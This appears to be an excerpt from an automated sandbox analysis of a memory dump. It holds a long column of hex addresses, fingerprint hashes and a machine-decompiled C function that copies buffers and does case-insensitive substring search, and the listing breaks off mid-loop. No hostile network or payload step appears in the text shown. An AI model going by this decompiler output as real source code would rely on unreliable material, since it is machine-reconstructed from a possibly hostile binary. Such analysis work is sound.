0x00000000
0x00000000
0x003bcf07
0x003bcf0b
0x003bcf0b
0x003bcf0d
0x003bcf11
0x003bcf15
0x003bcf15
0x003bcf1f
0x003bcf22
0x003bcf28
0x003bcf32
0x003bcf35
0x003bcf38
0x00000000
0x00000000
0x003bcf42
0x003bcf44
0x00000000
0x00000000
0x00000000
0x003bcf46
0x003bcda1
0x003bcda5
0x003bcda9
0x003bcdad
0x003bcdaf
0x003bcdb1
0x00000000
0x00000000
0x00000000
0x003bcdb1
0x003bcf58
0x003bcf5c
0x003bced3
0x003bced3
0x003bced5
0x00000000
0x00000000
0x003bcedb
0x00000000
0x00000000
0x003bcee1
0x003bcee5
0x003bcee7
0x00000000
0x003bcee7
0x003bcdb9
0x003bcdbd
0x003bcdbf
0x003bcdc3
0x003bcdc7
0x003bcdcb
0x003bcdcd
0x00000000
0x00000000
0x003bcdd3
0x003bcdd4
0x003bcdd6
0x00000000
0x00000000
0x003bcdd8
0x003bcddc
0x003bcde0
0x00000000
0x003bcde0
0x003bcec7
0x003bcecb
0x003bcecf
0x00000000
0x003bcde4
0x003bcdf0
0x003bcdf4
0x003bcdf4
0x003bcdfa
0x003bcdfe
0x003bcdfe
0x003bce03
0x003bce07
0x003bce0b
0x003bce0d
0x00000000
0x00000000
0x003bce13
0x003bce16
0x003bce18
0x00000000
0x00000000
0x003bce1a
0x003bce22
0x003bce26
0x003bce2c
0x00000000
0x00000000
0x00000000
0x003bce2c
0x003bcf67
0x003bcf6c
0x003bcf70
0x003bcf76
0x00000000
0x003bcf76
0x003bcdad
0x003bceb3
0x003bceb3
0x003bceb6
0x003bceba
0x003bcebe
0x00000000
0x003bcebe
0x003bc9fc
0x003bc9fd
0x003bca00
0x00000000
0x00000000
0x00000000
0x003bca00
0x003bcf7f
0x003bcf87
0x003bcf8d
0x003bcf8d
0x003bcf90
0x00000000
0x00000000
0x003bcf9a
0x003bcf9c
0x00000000
0x00000000
0x003bcfa2
0x003bcfa6
0x003bcfa6
0x003bcfa8
0x003bcfac
0x003bcfb0
0x003bcfb0
0x003bcfba
0x003bcfbd
0x003bcfc3
0x003bcfcd
0x003bcfd0
0x003bcfd3
0x00000000
0x00000000
0x003bcfdd
0x003bcfdf
0x00000000
0x00000000
0x00000000
0x003bcfe1
0x003bc8fe
0x003bc902
0x003bc906
0x00000000
0x003bc906
0x003bcfe6
0x003bcfea
0x003bcd50
0x003bcd50
0x003bcd52
0x00000000
0x00000000
0x003bcd58
0x00000000
0x00000000
0x003bcd5e
0x003bcd62
0x00000000
0x003bcd62
0x003bc916
0x003bc91a
0x003bc91c
0x003bc920
0x003bc924
0x003bc928
0x003bc92a
0x00000000
0x00000000
0x003bc930
0x003bc931
0x003bc933
0x00000000
0x00000000
0x003bc935
0x003bc939
0x003bc93d
0x00000000
0x003bc93d
0x003bcd44
0x003bcd48
0x003bcd4c
0x00000000
0x003bc941
0x003bc94d
0x003bc951
0x003bc951
0x003bc957
0x003bc95b
0x003bc95b
0x003bc960
0x003bc964
0x003bc968
0x003bc96a
0x00000000
0x00000000
0x003bc970
0x003bc973
0x003bc975
0x00000000
0x00000000
0x003bc977
0x003bc97f
0x003bc983
0x003bc989
0x00000000
0x00000000
0x00000000
0x003bc989
0x003bcff5
0x003bcffa
0x003bcffe
0x003bd004
0x00000000
0x003bd004
0x003bc90a
0x00000000
0x003bc768
0x003bc704
0x003bc707
0x003bc70a
0x003bc70c
0x00000000
0x00000000
0x003bc70e
0x003bc70e
0x003bc710
0x003bc710
0x003bc711
0x003bc716
0x003bc71b
0x003bc71d
0x00000000
0x00000000
0x003bc71f
0x003bc723
0x003bc727
0x003bc729
0x00000000
0x00000000
0x00000000
0x003bc729
0x00000000
0x003bc710
0x003bc6fe
0x003bc6b1
0x00000000
0x003bc6b1
0x003bc623
0x003bc623
0x003bc626
0x003bc646
0x003bc64a
0x003bc656
0x003bc656
0x003bc65c
0x003bc65c
0x003bc661
0x003bc665
0x003bc669
0x003bc66b
0x00000000
0x00000000
0x003bc671
0x003bc674
0x003bc676
0x00000000
0x00000000
0x003bc678
0x003bc67e
0x003bc695
0x003bc695
0x003bc69a
0x00000000
0x00000000
0x00000000
0x00000000
0x003bc680
0x003bc680
0x003bc684
0x003bc686
0x00000000
0x00000000
0x003bc68c
0x003bc68d
0x003bc693
0x00000000
0x00000000
0x00000000
0x003bc693
0x003bc8ab
0x003bc8ab
0x003bc8ae
0x003bc8be
0x003bc8b0
0x003bc8b2
0x003bc8b5
0x003bc8b5
0x00000000
0x003bc8ae
0x003bd00d
0x003bd012
0x00000000
0x003bd012
0x003bc628
0x003bc62a
0x003bc62c
0x00000000
0x00000000
0x003bc633
0x003bc633
0x003bc635
0x003bc635
0x003bc639
0x003bc63b
0x00000000
0x00000000
0x003bc641
0x003bc642
0x003bc644
0x00000000
0x00000000
0x00000000
0x003bc644
0x00000000
0x003bc635
0x003bc610
0x00000000
0x003bc610
0x003bc5c1
0x003bc5ea
0x003bc5ea
0x003bc5ec
0x003bc5ed
0x003bc5f2
0x00000000
0x003bc5f2
0x003bc5c3
0x003bc5c6
0x003bc5cb
0x00000000
0x00000000
0x003bc5cf
0x003bc5cf
0x003bc5d0
0x003bc5d5
0x003bc5dc
0x00000000
0x00000000
0x003bc5de
0x003bc5e2
0x003bc5e8
0x00000000
0x00000000
0x00000000
0x003bc5e8
0x00000000

Strings

@, xrefs: 003BC600

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 34e3e757357182d4be67d558aec357958c2c3175704b9db7323992076a550c51
Instruction ID: ba57e12eb8658cec65c98a15c3bae4753b065d50bd50cf64f5aff4c87a96435d
Opcode Fuzzy Hash: 34e3e757357182d4be67d558aec357958c2c3175704b9db7323992076a550c51
Instruction Fuzzy Hash: 846206756243128BC7358F29C4802AAB3E6BFD8718F29972DEA95D7B90E730DD41C781

Uniqueness

Uniqueness Score: -1.00%

Function 003C2E60, Relevance: 2.0, Strings: 1, Instructions: 797
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E003C2E60(signed int __ecx, void* __eflags, signed int _a4, char _a8) {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t230;
				signed int _t231;
				signed int* _t237;
				char* _t238;
				void* _t245;
				signed int _t246;
				char _t249;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				void* _t257;
				void* _t258;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t268;
				char _t271;
				signed int _t273;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t284;
				void* _t286;
				void* _t288;
				signed int _t292;
				void* _t295;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t308;
				signed int _t310;
				signed int _t311;
				char _t312;
				char _t313;
				char _t314;
				char _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				void* _t330;
				signed int _t331;
				signed int _t332;
				signed int _t335;
				signed int _t336;
				void* _t337;
				signed int _t340;
				void* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				char* _t347;
				signed int _t350;
				signed int _t352;
				void* _t355;
				signed int _t357;
				char _t359;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t386;
				void* _t389;
				signed int _t390;
				char _t392;
				signed int _t395;
				signed int _t400;
				char _t402;
				char _t403;
				char _t404;
				signed int _t406;
				unsigned int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t416;
				signed int _t421;
				signed int _t422;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t441;
				signed int _t443;
				signed int _t449;
				signed int _t450;
				signed int _t452;
				signed int _t461;
				signed int _t465;
				signed int _t466;
				signed int _t468;
				signed int _t469;
				signed int _t478;
				signed int _t482;
				void* _t485;

				_v56 = 0;
				_t449 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t406 = E003B1030();
				_t485 = (_t482 & 0xfffffff0) - 0x34 + 4;
				_t230 = _v56;
				if(_t230 == 0) {
					 *_t406 = 0;
					L8:
					_t231 = _a8;
					_v52 = 0x40;
					_v56 = _t406;
					if(_t231 != 0) {
						__eflags = _t406;
						if(_t406 == 0) {
							_t310 = 0x40;
							_t283 = 0;
							L22:
							_t20 = _t283 + 2; // 0x80000001
							_t341 = _t20;
							__eflags = _t341 - 0x40;
							_t342 =  <=  ? 0x40 : _t341;
							__eflags = _t310 - _t342;
							if(_t310 < _t342) {
								_t411 = (_t342 >> 5 >> 0x1a) + _t342 >> 6;
								_t343 = _t342 & 0x8000003f;
								__eflags = _t343;
								if(_t343 < 0) {
									_t343 = (_t343 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t343;
								}
								__eflags = _t343;
								_t413 = _t411 + (0 | _t343 > 0x00000000) << 6;
								_push(_t413);
								_t311 = E003B1030();
								_t485 = _t485 + 4;
								_t344 = _v56;
								__eflags = _t344;
								if(_t344 == 0) {
									 *_t311 = 0;
									goto L35;
								} else {
									__eflags = _t311;
									if(_t311 == 0) {
										L33:
										_push(1);
										_push(_t344);
										_v68 = _t311;
										E003B10B0();
										_t311 = _v68;
										_t485 = _t485 + 8;
										L35:
										_v52 = _t413;
										_v56 = _t311;
										L36:
										 *((char*)(_t311 + _t283)) = _a8;
										_t237 =  &_v56;
										 *((char*)(_t283 +  *_t237 + 1)) = 0;
										L37:
										_t238 =  *_t237;
										_v28 = _t238;
										_t284 = _a4;
										if(_t238 == 0) {
											L39:
											_push(0x40);
											 *_t284 = 0;
											 *(_t284 + 4) = 0;
											_t450 = E003B1030();
											_t485 = _t485 + 4;
											_t347 =  *_t284;
											if(_t347 == 0) {
												 *_t450 = 0;
												L61:
												 *_t284 = _t450;
												 *(_t284 + 4) = 0x40;
												L62:
												_push(1);
												_push(_v56);
												E003B10B0();
												_v56 = 0;
												_v52 = 0;
												return _t284;
											}
											if(_t450 == 0) {
												L45:
												_push(1);
												_push(_t347);
												E003B10B0();
												_t485 = _t485 + 8;
												goto L61;
											}
											_t312 =  *_t347;
											 *_t450 = _t312;
											if(_t312 == 0) {
												goto L45;
											}
											_t415 = 0;
											while(1) {
												_t415 = _t415 + 1;
												_t313 =  *((char*)(_t347 + _t415 * 2 - 1));
												 *((char*)(_t450 + _t415 * 2 - 1)) = _t313;
												if(_t313 == 0) {
													goto L45;
												}
												_t314 =  *((char*)(_t347 + _t415 * 2));
												 *((char*)(_t450 + _t415 * 2)) = _t314;
												if(_t314 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t315 =  *_t238;
										_v48 = _t315;
										if(_t315 != 0) {
											_t350 =  *_t449;
											_v60 = _t350;
											__eflags = _t350;
											if(_t350 == 0) {
												L53:
												_push(0x40);
												 *_t284 = 0;
												 *(_t284 + 4) = 0;
												_t450 = E003B1030();
												_t485 = _t485 + 4;
												_t352 =  *_t284;
												__eflags = _t352;
												if(_t352 == 0) {
													 *_t450 = 0;
													goto L61;
												}
												__eflags = _t450;
												if(_t450 == 0) {
													L59:
													_push(1);
													_push(_t352);
													E003B10B0();
													_t485 = _t485 + 8;
													goto L61;
												}
												_t316 =  *_t352;
												 *_t450 = _t316;
												__eflags = _t316;
												if(_t316 == 0) {
													goto L59;
												}
												_t416 = 0;
												__eflags = 0;
												while(1) {
													_t416 = _t416 + 1;
													_t317 =  *((char*)(_t352 + _t416 * 2 - 1));
													 *(_t450 + _t416 * 2 - 1) = _t317;
													__eflags = _t317;
													if(_t317 == 0) {
														goto L59;
													}
													_t318 =  *((char*)(_t352 + _t416 * 2));
													 *(_t450 + _t416 * 2) = _t318;
													__eflags = _t318;
													if(_t318 != 0) {
														continue;
													}
													goto L59;
												}
												goto L59;
											}
											__eflags =  *_t350;
											if( *_t350 == 0) {
												goto L53;
											}
											_t417 = _t315;
											_t319 = _t350;
											_t63 = _t417 - 0x41; // -65
											_t452 = _t63;
											_v64 = _t452;
											__eflags = _t452 - 0x19;
											_t65 = _t417 + 0x20; // 0x20
											_t354 =  >  ? _t315 : _t65;
											_t245 =  >  ? _t315 : _t65;
											_t355 = 0;
											__eflags = 0;
											while(1) {
												_t286 =  *_t319;
												__eflags = _t286 - 0x41 - 0x19;
												_t287 =  <=  ? _t286 + 0x20 : _t286;
												__eflags = ( <=  ? _t286 + 0x20 : _t286) - _t245;
												if(( <=  ? _t286 + 0x20 : _t286) == _t245) {
													break;
												}
												_t355 = _t355 + 1;
												_t319 = _t319 + 1;
												_t300 = _v60;
												__eflags =  *((char*)(_t355 + _t300));
												if( *((char*)(_t355 + _t300)) != 0) {
													continue;
												}
												L52:
												_t284 = _a4;
												goto L53;
											}
											_t284 = _a4;
											__eflags = _t319;
											if(_t319 == 0) {
												goto L53;
											}
											_t357 = _v28 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t421 =  ~_t357 + 0x10;
											__eflags = _t421;
											_v32 = _t421;
											_v40 = _v48 + 0x20;
											_t246 = _t421;
											do {
												_t422 = _t357;
												__eflags = _t357;
												if(_t357 == 0) {
													L69:
													_t461 =  ~( ~_t422 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t461;
													while(1) {
														asm("movdqu xmm1, [eax+edi]");
														asm("pcmpeqb xmm1, xmm0");
														asm("pmovmskb ebx, xmm1");
														__eflags = _t284;
														if(_t284 != 0) {
															break;
														}
														_t422 = _t422 + 0x10;
														__eflags = _t422 - _t461;
														if(_t422 < _t461) {
															continue;
														}
														__eflags = _t461 - 0x7fffffff;
														if(_t461 >= 0x7fffffff) {
															L76:
															_t461 = 0x7fffffff;
															L77:
															_v68 = _t461;
															_t288 = 0;
															__eflags = 0;
															_v44 = _t357;
															while(1) {
																_t249 =  *((char*)(_t288 + _t319));
																_t359 =  *((char*)(_t288 + _v28));
																__eflags = _t249 - 0x61 - 0x19;
																_t250 =  <=  ? _t249 - 0x20 : _t249;
																__eflags = _t359 - 0x61 - 0x19;
																_t251 =  <=  ? _t249 - 0x20 : _t249;
																_t360 =  <=  ? _t359 - 0x20 : _t359;
																_t361 =  <=  ? _t359 - 0x20 : _t359;
																__eflags = _t251 - ( <=  ? _t359 - 0x20 : _t359);
																if(__eflags < 0 || __eflags > 0) {
																	break;
																}
																__eflags = _t251;
																if(_t251 == 0) {
																	L82:
																	_t357 = _v44;
																	_t466 = _v40;
																	_t284 = _a4;
																	L83:
																	__eflags = _t319;
																	if(_t319 == 0) {
																		goto L53;
																	}
																	_v44 = _t357;
																	while(1) {
																		L85:
																		_t254 = _t319;
																		_t292 = _t319 + 1;
																		__eflags = _t292;
																		if(_t292 == 0) {
																			break;
																		}
																		__eflags =  *(_t319 + 1);
																		if( *(_t319 + 1) == 0) {
																			break;
																		}
																		__eflags = _v64 - 0x19;
																		_t388 =  <=  ? _t466 : _v48;
																		_t389 =  <=  ? _t466 : _v48;
																		_v36 = _t254;
																		_v40 = _t466;
																		while(1) {
																			_t319 = _t319 + 1;
																			_t292 = _t292 + 1;
																			_t266 =  *_t319 & 0x000000ff;
																			_t466 =  *((char*)(_t292 - 1)) + 0xffffffbf;
																			__eflags = _t466 - 0x19;
																			_t267 =  <=  ? _t266 + 0x20 : _t266;
																			__eflags = ( <=  ? _t266 + 0x20 : _t266) - _t389;
																			if(( <=  ? _t266 + 0x20 : _t266) == _t389) {
																				break;
																			}
																			__eflags =  *_t292;
																			if( *_t292 != 0) {
																				continue;
																			}
																			L90:
																			_t254 = _v36;
																			_t365 = _v44;
																			_t284 = _a4;
																			L91:
																			__eflags = _t365;
																			if(_t365 == 0) {
																				L95:
																				_t325 =  ~( ~_t365 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																				__eflags = _t325;
																				while(1) {
																					asm("movdqu xmm1, [edi+edx]");
																					asm("pcmpeqb xmm1, xmm0");
																					asm("pmovmskb esi, xmm1");
																					__eflags = _t466;
																					if(_t466 != 0) {
																						break;
																					}
																					_t365 = _t365 + 0x10;
																					__eflags = _t365 - _t325;
																					if(_t365 < _t325) {
																						continue;
																					}
																					__eflags = _t325 - 0x7fffffff;
																					if(_t325 >= 0x7fffffff) {
																						L102:
																						_t325 = 0x7fffffff;
																						L103:
																						_t468 = _v60 & 0x0000000f;
																						__eflags = _t468;
																						if(_t468 == 0) {
																							L107:
																							_t433 =  ~( ~_t468 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																							__eflags = _t433;
																							while(1) {
																								asm("movdqu xmm1, [ebx+esi]");
																								asm("pcmpeqb xmm1, xmm0");
																								asm("pmovmskb edx, xmm1");
																								__eflags = _t365;
																								if(_t365 != 0) {
																									break;
																								}
																								_t468 = _t468 + 0x10;
																								__eflags = _t468 - _t433;
																								if(_t468 < _t433) {
																									continue;
																								}
																								_t284 = _a4;
																								__eflags = _t433 - 0x7fffffff;
																								if(_t433 >= 0x7fffffff) {
																									L114:
																									_t433 = 0x7fffffff;
																									L115:
																									_t366 = _v60;
																									_t256 = _t254 - _t366 + _t325;
																									_t326 = 0;
																									__eflags = _t256;
																									 *_t284 = 0;
																									_t257 =  <=  ? 0 : _t256;
																									__eflags = _t433 - _t257;
																									 *(_t284 + 4) = 0;
																									_t258 =  <  ? _t433 : _t257;
																									_t434 = _t433 - _t258;
																									_t367 = _t366 + _t258;
																									__eflags = _t367;
																									_v64 = _t367;
																									if(_t367 == 0) {
																										L151:
																										_push(0x40);
																										_t450 = E003B1030();
																										_t485 = _t485 + 4;
																										_t368 =  *_t284;
																										__eflags = _t368;
																										if(_t368 == 0) {
																											 *_t450 = 0;
																											goto L61;
																										}
																										__eflags = _t450;
																										if(_t450 == 0) {
																											L157:
																											_push(1);
																											_push(_t368);
																											E003B10B0();
																											_t485 = _t485 + 8;
																											goto L61;
																										}
																										_t327 =  *_t368;
																										 *_t450 = _t327;
																										__eflags = _t327;
																										if(_t327 == 0) {
																											goto L157;
																										}
																										_t435 = 0;
																										__eflags = 0;
																										while(1) {
																											_t435 = _t435 + 1;
																											_t328 =  *((char*)(_t368 + _t435 * 2 - 1));
																											 *(_t450 + _t435 * 2 - 1) = _t328;
																											__eflags = _t328;
																											if(_t328 == 0) {
																												goto L157;
																											}
																											_t329 =  *((char*)(_t368 + _t435 * 2));
																											 *(_t450 + _t435 * 2) = _t329;
																											__eflags = _t329;
																											if(_t329 != 0) {
																												continue;
																											}
																											goto L157;
																										}
																										goto L157;
																									}
																									_t369 = _v60;
																									__eflags =  *(_t369 + _t258);
																									if( *(_t369 + _t258) == 0) {
																										goto L151;
																									}
																									__eflags = _t434;
																									if(_t434 != 0) {
																										L130:
																										_t144 = _t434 + 1; // 0x80000000
																										_t330 = _t144;
																										__eflags = _t330 - 0x40;
																										_t331 =  <=  ? 0x40 : _t330;
																										__eflags = _t331;
																										if(_t331 > 0) {
																											_v68 = (_t331 >> 5 >> 0x1a) + _t331 >> 6;
																											_t332 = _t331 & 0x8000003f;
																											__eflags = _t332;
																											if(_t332 < 0) {
																												_t332 = (_t332 - 0x00000001 | 0xffffffc0) + 1;
																												__eflags = _t332;
																											}
																											__eflags = _t332;
																											_t335 = _v68 + (0 | _t332 > 0x00000000) << 6;
																											_v68 = _t335;
																											_push(_t335);
																											_t469 = E003B1030();
																											_t485 = _t485 + 4;
																											_t336 =  *_t284;
																											__eflags = _t336;
																											if(_t336 == 0) {
																												 *_t469 = 0;
																												goto L143;
																											} else {
																												__eflags = _t469;
																												if(_t469 == 0) {
																													L141:
																													_push(1);
																													_push(_t336);
																													E003B10B0();
																													_t485 = _t485 + 8;
																													L143:
																													 *(_t284 + 4) = _v68;
																													 *_t284 = _t469;
																													L144:
																													__eflags = _t469;
																													if(_t469 == 0) {
																														goto L62;
																													}
																													_t262 = _v64;
																													_t337 = 0;
																													while(1) {
																														_t379 =  *_t262;
																														_t337 = _t337 + 1;
																														 *_t469 = _t379;
																														__eflags = _t434;
																														if(_t434 == 0) {
																															goto L149;
																														}
																														__eflags = _t337 - _t434;
																														if(_t337 == _t434) {
																															 *(_t469 + 1) = 0;
																															goto L62;
																														}
																														L149:
																														__eflags = _t379;
																														if(_t379 == 0) {
																															goto L62;
																														}
																														_t469 = _t469 + 1;
																														_t262 = _t262 + 1;
																														__eflags = _t262;
																													}
																												}
																												_t380 =  *_t336;
																												 *_t469 = _t380;
																												__eflags = _t380;
																												if(_t380 == 0) {
																													goto L141;
																												}
																												_t381 = 0;
																												__eflags = 0;
																												while(1) {
																													_t381 = _t381 + 1;
																													_t264 =  *((char*)(_t336 + _t381 * 2 - 1));
																													 *(_t469 + _t381 * 2 - 1) = _t264;
																													__eflags = _t264;
																													if(_t264 == 0) {
																														break;
																													}
																													_t265 =  *((char*)(_t336 + _t381 * 2));
																													 *(_t469 + _t381 * 2) = _t265;
																													__eflags = _t265;
																													if(_t265 != 0) {
																														continue;
																													}
																													break;
																												}
																												_t284 = _a4;
																												goto L141;
																											}
																										}
																										_t469 = 0;
																										goto L144;
																									}
																									_t382 = _t369 + _t258;
																									_v60 = _t382;
																									_t383 = _t382 & 0x0000000f;
																									__eflags = _t383;
																									if(_t383 == 0) {
																										L122:
																										_t434 =  ~( ~_t383 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																										__eflags = _t434;
																										while(1) {
																											asm("movdqu xmm1, [esi+edx]");
																											asm("pcmpeqb xmm1, xmm0");
																											asm("pmovmskb ecx, xmm1");
																											__eflags = _t326;
																											if(_t326 != 0) {
																												break;
																											}
																											_t383 = _t383 + 0x10;
																											__eflags = _t383 - _t434;
																											if(_t383 < _t434) {
																												continue;
																											}
																											__eflags = _t434 - 0x7fffffff;
																											if(_t434 >= 0x7fffffff) {
																												L129:
																												_t434 = 0x7fffffff;
																												goto L130;
																											}
																											_t384 = _v60;
																											while(1) {
																												__eflags =  *((char*)(_t434 + _t384));
																												if( *((char*)(_t434 + _t384)) == 0) {
																													goto L130;
																												}
																												_t434 = _t434 + 1;
																												__eflags = _t434 - 0x7fffffff;
																												if(_t434 < 0x7fffffff) {
																													continue;
																												}
																												goto L129;
																											}
																											goto L130;
																										}
																										asm("bsf edi, ecx");
																										_t434 = _t434 + _t383;
																										goto L130;
																									}
																									_t434 = 0;
																									_t326 = _v60;
																									_t383 =  ~_t383 + 0x10;
																									__eflags = _t383;
																									while(1) {
																										__eflags =  *((char*)(_t434 + _t326));
																										if( *((char*)(_t434 + _t326)) == 0) {
																											goto L130;
																										}
																										_t434 = _t434 + 1;
																										__eflags = _t434 - _t383;
																										if(_t434 < _t383) {
																											continue;
																										}
																										goto L122;
																									}
																									goto L130;
																								}
																								_t386 = _v60;
																								while(1) {
																									__eflags =  *((char*)(_t433 + _t386));
																									if( *((char*)(_t433 + _t386)) == 0) {
																										goto L115;
																									}
																									_t433 = _t433 + 1;
																									__eflags = _t433 - 0x7fffffff;
																									if(_t433 < 0x7fffffff) {
																										continue;
																									}
																									goto L114;
																								}
																								goto L115;
																							}
																							asm("bsf edi, edx");
																							_t284 = _a4;
																							_t433 = _t433 + _t468;
																							goto L115;
																						}
																						_t433 = 0;
																						_t365 = _v60;
																						_t468 =  ~_t468 + 0x10;
																						__eflags = _t468;
																						while(1) {
																							__eflags =  *((char*)(_t433 + _t365));
																							if( *((char*)(_t433 + _t365)) == 0) {
																								goto L115;
																							}
																							_t433 = _t433 + 1;
																							__eflags = _t433 - _t468;
																							if(_t433 < _t468) {
																								continue;
																							}
																							goto L107;
																						}
																						goto L115;
																					}
																					_t365 = _v28;
																					while(1) {
																						__eflags =  *(_t325 + _t365);
																						if( *(_t325 + _t365) == 0) {
																							goto L103;
																						}
																						_t325 = _t325 + 1;
																						__eflags = _t325 - 0x7fffffff;
																						if(_t325 < 0x7fffffff) {
																							continue;
																						}
																						goto L102;
																					}
																					goto L103;
																				}
																				asm("bsf ecx, esi");
																				_t325 = _t325 + _t365;
																				goto L103;
																			}
																			_t365 = _v32;
																			_t325 = 0;
																			__eflags = 0;
																			_t441 = _v28;
																			_t466 = _t365;
																			while(1) {
																				__eflags =  *((char*)(_t325 + _t441));
																				if( *((char*)(_t325 + _t441)) == 0) {
																					goto L103;
																				}
																				_t325 = _t325 + 1;
																				__eflags = _t325 - _t466;
																				if(_t325 < _t466) {
																					continue;
																				}
																				goto L95;
																			}
																			goto L103;
																		}
																		_t254 = _v36;
																		_t466 = _v40;
																		__eflags = _t319;
																		if(_t319 == 0) {
																			break;
																		}
																		_v36 = _t254;
																		_v40 = _t466;
																		_t390 = _v44;
																		_t268 = _v32;
																		do {
																			_t443 = _t390;
																			__eflags = _t390;
																			if(_t390 == 0) {
																				L169:
																				_t478 =  ~( ~_t443 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																				__eflags = _t478;
																				while(1) {
																					asm("movdqu xmm1, [eax+edi]");
																					asm("pcmpeqb xmm1, xmm0");
																					asm("pmovmskb ebx, xmm1");
																					__eflags = _t292;
																					if(_t292 != 0) {
																						break;
																					}
																					_t443 = _t443 + 0x10;
																					__eflags = _t443 - _t478;
																					if(_t443 < _t478) {
																						continue;
																					}
																					__eflags = _t478 - 0x7fffffff;
																					if(_t478 >= 0x7fffffff) {
																						L176:
																						_t478 = 0x7fffffff;
																						L177:
																						_v68 = _t478;
																						_t295 = 0;
																						__eflags = 0;
																						_v44 = _t390;
																						while(1) {
																							_t271 =  *((char*)(_t295 + _t319));
																							_t392 =  *((char*)(_t295 + _v28));
																							__eflags = _t271 - 0x61 - 0x19;
																							_t272 =  <=  ? _t271 - 0x20 : _t271;
																							__eflags = _t392 - 0x61 - 0x19;
																							_t273 =  <=  ? _t271 - 0x20 : _t271;
																							_t393 =  <=  ? _t392 - 0x20 : _t392;
																							_t394 =  <=  ? _t392 - 0x20 : _t392;
																							__eflags = _t273 - ( <=  ? _t392 - 0x20 : _t392);
																							if(__eflags < 0 || __eflags > 0) {
																								break;
																							}
																							__eflags = _t273;
																							if(_t273 == 0) {
																								L182:
																								_t254 = _v36;
																								_t466 = _v40;
																								L183:
																								__eflags = _t319;
																								if(_t319 != 0) {
																									goto L85;
																								}
																								goto L184;
																							}
																							_t295 = _t295 + 1;
																							__eflags = _t295 - _v68;
																							if(_t295 < _v68) {
																								continue;
																							}
																							goto L182;
																						}
																						_t365 = _v44;
																						_t466 = _t319 + 1;
																						__eflags = _t466;
																						if(_t466 == 0) {
																							goto L192;
																						}
																						__eflags = _v64 - 0x19;
																						_t297 =  <=  ? _v40 : _v48;
																						_t292 =  <=  ? _v40 : _v48;
																						__eflags =  *(_t319 + 1);
																						if( *(_t319 + 1) == 0) {
																							goto L192;
																						}
																						_v44 = _t365;
																						while(1) {
																							_t319 = _t319 + 1;
																							_t466 = _t466 + 1;
																							_t395 =  *_t319 & 0x000000ff;
																							__eflags =  *((char*)(_t466 - 1)) + 0xffffffbf - 0x19;
																							_t396 =  <=  ? _t395 + 0x20 : _t395;
																							__eflags = ( <=  ? _t395 + 0x20 : _t395) - _t292;
																							if(( <=  ? _t395 + 0x20 : _t395) == _t292) {
																								goto L191;
																							}
																							__eflags =  *_t466;
																							if( *_t466 != 0) {
																								continue;
																							}
																							goto L90;
																						}
																						goto L191;
																					}
																					_t298 = _v28;
																					while(1) {
																						__eflags =  *((char*)(_t478 + _t298));
																						if( *((char*)(_t478 + _t298)) == 0) {
																							break;
																						}
																						_t478 = _t478 + 1;
																						__eflags = _t478 - 0x7fffffff;
																						if(_t478 < 0x7fffffff) {
																							continue;
																						}
																						goto L176;
																					}
																					L193:
																					__eflags = _t478;
																					if(__eflags == 0) {
																						goto L176;
																					}
																					if(__eflags > 0) {
																						goto L177;
																					}
																					_v44 = _t390;
																					_t254 = _v36;
																					_t466 = _v40;
																					goto L183;
																				}
																				asm("bsf esi, ebx");
																				_t478 = _t478 + _t443;
																				goto L193;
																			}
																			_t292 = _v28;
																			_t443 = _t268;
																			_t478 = 0;
																			__eflags = 0;
																			while(1) {
																				__eflags =  *((char*)(_t478 + _t292));
																				if( *((char*)(_t478 + _t292)) == 0) {
																					goto L193;
																				}
																				_t478 = _t478 + 1;
																				__eflags = _t478 - _t268;
																				if(_t478 < _t268) {
																					continue;
																				}
																				goto L169;
																			}
																			goto L193;
																			L191:
																			_t390 = _v44;
																			_t268 = _v32;
																			__eflags = _t319;
																		} while (_t319 != 0);
																		L192:
																		_t254 = _v36;
																		_t284 = _a4;
																		goto L91;
																	}
																	L184:
																	_t365 = _v44;
																	goto L91;
																}
																_t288 = _t288 + 1;
																__eflags = _t288 - _v68;
																if(_t288 < _v68) {
																	continue;
																}
																goto L82;
															}
															_t362 = _v44;
															_t465 = _t319 + 1;
															__eflags = _t465;
															if(_t465 == 0) {
																goto L52;
															}
															__eflags = _v64 - 0x19;
															_t290 =  <=  ? _v40 : _v48;
															_t284 =  <=  ? _v40 : _v48;
															__eflags =  *(_t319 + 1);
															if( *(_t319 + 1) == 0) {
																goto L52;
															}
															_v44 = _t362;
															while(1) {
																_t319 = _t319 + 1;
																_t465 = _t465 + 1;
																_t363 =  *_t319 & 0x000000ff;
																__eflags =  *((char*)(_t465 - 1)) + 0xffffffbf - 0x19;
																_t364 =  <=  ? _t363 + 0x20 : _t363;
																__eflags = ( <=  ? _t363 + 0x20 : _t363) - _t284;
																if(( <=  ? _t363 + 0x20 : _t363) == _t284) {
																	goto L207;
																}
																__eflags =  *_t465;
